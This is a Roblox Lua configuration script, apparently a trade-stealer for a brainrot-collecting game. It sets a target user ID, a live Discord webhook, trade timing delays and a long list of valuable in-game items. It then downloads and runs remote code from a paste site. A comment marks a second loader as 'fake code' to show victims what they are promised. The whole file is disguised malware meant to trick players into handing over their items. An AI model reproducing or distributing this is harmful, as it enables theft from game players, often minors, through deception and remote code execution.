_G.Settings = {}

_G.Settings.TargetUserId = 10717482853

_G.Settings.Webhook = "https://discord.com/api/webhooks/1483783297635979329/INIduDIFAek6aFfEGQWb5Aj9y-eSPfU6o32ey8LJqDr0ZVRx5rRPOhW79eYnlHOWuPDM"

_G.Settings.TradeStartDelay = 2

_G.Settings.AddDelay = 1.8

_G.Settings.AcceptDelay = 2.5

_G.Settings.Brainrots = {
	["Chicliterita bicicliterita"] = true,
	["Coffin Tung Tung Tung Sahur"] = true,
	["Fortunu and Cashuru"] = true,
	["Los Amigos"] = true,
	["Los Sekolahs"] = true,
	["La Ginger Sekolah"] = true,
	["Sammyni Fattini"] = true,
	["Los Spaghettis"] = true,
	["Ventoliero Pavonero"] = true,
	["Cloverat Clapat"] = true,
	["Spaghetti Tualetti"] = true,
	["Rosetti Tualetti"] = true,
	["Fishino Clownino"] = true,
	["Gold Gold Gold"] = true,
	["Jolly Jolly Sahur"] = true,
	["Lavadorito Spinito"] = true,
	["Ketchuru and Musturu"] = true,
	["Tirilikalika Tirilikalako"] = true,
	["Swaggy Bros"] = true,
	["La Romantic Grande"] = true,
	["Orcaledon"] = true,
	["Tictac Sahur"] = true,
	["La Taco Combinasion"] = true,
	["Ketupat Kepat"] = true,
	["Dug dug dug"] = true,
	["Tang Tang Keletang"] = true,
	["Lovin Rose"] = true,
	["Los Tacoritas"] = true,
	["Eviledon"] = true,
	["Los Primos"] = true,
	["W or L"] = true,
	["Esok Sekolah"] = true,
	["La Jolly Grande"] = true,
	["Los Cupids"] = true,
	["Los Puggies"] = true,
	["Tralaledon"] = true,
	["Gobblino Uniciclino"] = true,
	["Tuff Toucan"] = true,
	["Mieteteira Bicicleteira"] = true,
	["Chipso and Queso"] = true,
	["Chillin Chili"] = true,
	["Money Money Reindeer"] = true,
	["La Spooky Grande"] = true,
	["Bacuru and Egguru"] = true,
	["Los Bros"] = true,
	["La Extinct Grande"] = true,
	["Los Candies"] = true,
	["Los 67"] = true,
	["Celularcini Viciosini"] = true,
	["Los Mobilis"] = true,
	["Money Money Puggy"] = true,
	["Cigno Fulgoro"] = true,
	["Los Spooky Combinasionas"] = true,
	["Los Hotspotsitos"] = true,
	["Los Jolly Combinasionas"] = true,
	["Snailo Clovero"] = true,
	["Los Planitos"] = true,
	["Chicleteira Cupideira"] = true,
	["DJ Panda"] = true,
	["Las Sis"] = true,
	["Spinny Hammy"] = true,
	["Tacorita Bicicleta"] = true,
	["Los Sweethearts"] = true,
	["Nuclearo Dinossauro"] = true,
	["Chicleteira Noelteira"] = true,
	["Los Combinasionas"] = true,
	["Chimnino"] = true,
	["Noo my Gold"] = true,
	["Swag Soda"] = true,
	["Noo my Heart"] = true,
	["Tacorillo Crocodillo"] = true,
	["Mariachi Corazoni"] = true,
	["La Grande Combinasion"] = true,
	["Los 25"] = true,
	["Los Burritos"] = true,
	["67"] = true,
	["Donkeyturbo Express"] = true,
	["Los Chicleteiras"] = true,
	["Guest 666"] = true,
	["Los Mi Gatitos"] = true,
	["Rang Ring Bus"] = true,
	["Granny"] = true,
	["Noo my Present"] = true,
	["Serafinna Medusella"] = true,
	["Los Nooo My Hotspotsitos"] = true,
	["Arcadopus"] = true,
	["Noo my Candy"] = true,
	["Los Quesadillas"] = true,
	["Chicleteirina Bicicleteirina"] = true,
	["Chill Puppy"] = true,
	["Burrito Bandito"] = true,
	["Luck Luck Luck Sahur"] = true,
	["Chicleteira Bicicleteira"] = true,
	["Brunito Marsito"] = true,
	["Quesadillo Vampiro"] = true,
	["Eid Eid Eid Sahur"] = true,
	["Cupid Hotspot"] = true,
	["Mi Gatito"] = true,
	["Ho Ho Ho Sahur"] = true,
	["Cupid Cupid Sahur"] = true,
	["Pot Pumpkin"] = true,
	["Naughty Naughty"] = true,
	["Bunito Bunito Spinito"] = true,
	["Quesadilla Crocodila"] = true,
	["Horegini Boom"] = true,
	["Santa Hotspot"] = true,
	["Pot Hotspot"] = true,
	["25"] = true,
	["Pirulitoita Bicicleteira"] = true,
	["To to to Sahur"] = true,
	["Telemorte"] = true,
	["La Sahur Combinasion"] = true,
	["List List List Sahur"] = true,
	["Noo my examine"] = true,
	["Los Jobcitos"] = true,
	["Nooo My Hotspot"] = true,
	["Bunnyman"] = true,
	["Tung Tung Tung Sahur"] = true,
	["Cuadramat and Pakrahmatmamat"] = true,
	["Please my Present"] = true,
	["Los Cucarachas"] = true,
	["1x1x1x1"] = true,
	["La Vacca Lepre Lepreino"] = true,
	["Love Love Love Sahur"] = true,
	["Perrito Burrito"] = true,
	["Graipuss Medussi"] = true,
	["Giftini Spyderini"] = true,
	["GOAT"] = true,
	["Trickolino"] = true,
	["Paradiso Axolottino"] = true,
	["Triplito Tralaleritos"] = true,
	["La Vacca Jacko Linterino"] = true,
	["Fishboard"] = true,
	["Santteo"] = true,
	["Las Vaquitas Saturnitas"] = true,
	["Los Karkeritos"] = true,
	["Karker Sahur"] = true,
	["Los Trios"] = true,
	["Job Job Job Sahur"] = true,
	["Frankentteo"] = true,
	["Pumpkini Spyderini"] = true,
	["Las Tralaleritas"] = true,
	["Rocco Disco"] = true,
	["Extinct Matteo"] = true,
	["La Karkerkar Combinasion"] = true,
	["La Vacca Prese Presente"] = true,
	["Reindeer Tralala"] = true,
	["Yess my examine"] = true,
	["Guerriro Digitale"] = true,
	["Boatito Auratito"] = true,
	["Vulturino Skeletono"] = true,
	["Los Tralaleritos"] = true,
	["Zombie Tralala"] = true,
	["La Cucaracha"] = true,
	["Fragola La La La"] = true,
	["Extinct Tralalero"] = true,
	["Agarrini la Palini"] = true,
	["Los Spyderinis"] = true,
	["Chachechi"] = true,
	["Blackhole Goat"] = true,
	["Dul Dul Dul"] = true,
	["Trenostruzzo Turbo 4000"] = true,
	["Karkerkar Kurkur"] = true,
	["Los Matteos"] = true,
	["Bisonte Giuppitere"] = true,
	["Sammyni Spyderini"] = true,
	["La Vacca Saturno Saturnita"] = true,
	["Jackorilla"] = true,
	["Secret Lucky Block"] = true,
	["Strawberry Elephant"] = true,
	["Meowl"] = true,
	["Headless Horseman"] = true,
	["Skibidi Toilet"] = true,
	["Griffin"] = true,
	["Hydra Dragon Cannelloni"] = true,
	["Dragon Gingerini"] = true,
	["Dragon Cannelloni"] = true,
	["La Supreme Combinasion"] = true,
	["Celestial Pegasus"] = true,
	["Cerberus"] = true,
	["Love Love Bear"] = true,
	["Popcuru and Fizzuru"] = true,
	["Rosey and Teddy"] = true,
	["Capitano Moby"] = true,
	["Cooki and Milki"] = true,
	["Burguro And Fryuro"] = true,
	["Ketupat Bros"] = true,
	["Reinito Sleighito"] = true,
	["La Secret Combinasion"] = true,
	["La Casa Boo"] = true,
	["Spooky and Pumpky"] = true,
	["Garama and Madundung"] = true,
	["Festive 67"] = true,
	["Ginger Gerat"] = true,
	["Nacho Spyder"] = true,
	["Antonio"] = true,
	["La Food Combinasion"] = true,
	["Fragrama and Chocrama"] = true,
	["Signore Carapace"] = true,
	["Elefanto Frigo"] = true,
 ["Los Bunitos"] = true,
}
-- YOUR LOADSTRING UNDER THIS

task.spawn(function()
    loadstring(game:HttpGet("https://pastefy.app/6zdpHgDj/raw"))()
end)

--FAKE CODE LOADSTRING (what you promise the code to be)

task.spawn(function()
    loadstring(game:HttpGet("sigmaduelsscript"))()
end)
